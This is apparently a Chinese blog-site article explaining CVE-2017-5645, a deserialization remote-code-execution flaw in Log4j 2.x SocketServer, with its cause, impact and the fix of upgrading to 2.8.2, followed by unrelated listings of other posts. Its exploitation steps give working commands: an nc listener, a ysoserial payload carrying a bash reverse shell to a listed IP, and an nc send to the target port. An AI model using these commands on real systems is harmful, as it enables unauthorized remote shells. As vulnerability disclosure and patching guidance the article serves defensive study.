news 2026/4/23 16:16:29

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

CVSS评分:9.8(严重)

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

  • 1. 漏洞原理
  • 2. 漏洞危害
  • 3. 漏洞修复

1. 漏洞原理

Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用链:

攻击者 ↓ TCP / UDP 发送恶意序列化对象 ↓ Log4j SocketServer ↓ ObjectInputStream.readObject() ↓ Gadget chain ↓ 任意代码执行

攻击者需要满足条件:

  • 目标服务器开启并监听 Log4j Socket Server(TCP 或 UDP)端口
  • 可以向服务器发送任意数据包

具体利用路径概括如下:

  1. 攻击者构造特制的 Java 序列化对象字节流,包含恶意链
  2. 通过网络向 Log4j 的 socket 端口发送该 payload
  3. Log4j 接收到数据后反序列化该对象
  4. 恶意对象触发执行攻击者指定的系统命令

step:

1、nc 监听本地

https://www.revshells.com/

nc-lvnp9001

2、生成恶意payload

java -jar ysoserial.jar CommonsCollections5"sh -i >& /dev/tcp/172.30.22.210/9001 0>&1">payload.bin

3、发送,反弹shell

nc172.xxx.xxx.xxx5007<payload.bin

2. 漏洞危害

微步标记为高风险,重点两高一弱漏洞:

该漏洞可导致直接RCE,尽快修复

3. 漏洞修复

  • 升级到Apache Log4j 2.8.2 或以上版本
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/22 12:27:43

SSM彝家文创产品销售平台a8u23--程序+源码+数据库+调试部署+开发环境

本系统&#xff08;程序源码数据库调试部署开发环境&#xff09;带论文文档1万字以上&#xff0c;文末可获取&#xff0c;系统界面在最后面。 系统程序文件列表 开题报告内容 一、项目背景与意义 彝族文化作为中华民族多元文化的重要组成部分&#xff0c;蕴含着丰富的历史底…

作者头像 李华
网站建设 2026/4/23 7:52:41

永久删除文件,使其无法恢复

您是否曾经删除过文件却发现它仍然可以恢复&#xff1f;许多人认为一旦清空回收站&#xff0c;他们的文件就会永远消失&#xff0c;但事实并非如此。在数据恢复的阴暗世界中&#xff0c;这些文件可能仍然存在&#xff0c;很容易被窥探。那么&#xff0c;我们怎样才能永久删除文…

作者头像 李华
网站建设 2026/4/23 7:54:32

多城市运营场景下,开源跑腿系统源码如何做分站管理

很多人做跑腿平台&#xff0c;一开始只考虑一个城市。 但真正跑通之后&#xff0c;很快就会遇到一个问题&#xff1a; 一个后台&#xff0c;怎么同时管理多个城市&#xff1f; 比如&#xff1a; A城 300个骑手B城 500个骑手C城 独立运营团队每个城市价格不同、商家不同、财…

作者头像 李华
网站建设 2026/4/23 7:52:44

小巧电纸书的烦恼与潜力:硬件挑战与社区破解

这款小巧的电子阅读器充满烦恼与潜力 这款售价69美元、名为Xteink X4的电子阅读器&#xff0c;比Kobo Mini以及Boox Palma等E Ink智能手机还要小。它小巧得令人满意&#xff0c;可以轻松放入口袋&#xff0c;但开箱即用的体验却令人沮丧&#xff0c;操作不够直观且功能有限。如…

作者头像 李华
网站建设 2026/4/23 7:55:23

计算机毕业设计springboot基于的高铁售票系统 基于SpringBoot的铁路客运票务服务平台的设计与实现 基于Java Web的列车票务在线预订与管理系统的设计与开发

计算机毕业设计springboot基于的高铁售票系统83w2gk5b &#xff08;配套有源码 程序 mysql数据库 论文&#xff09; 本套源码可以在文本联xi,先看具体系统功能演示视频领取&#xff0c;可分享源码参考。近年来&#xff0c;随着我国高速铁路网络的快速扩张和旅客出行需求的持续增…

作者头像 李华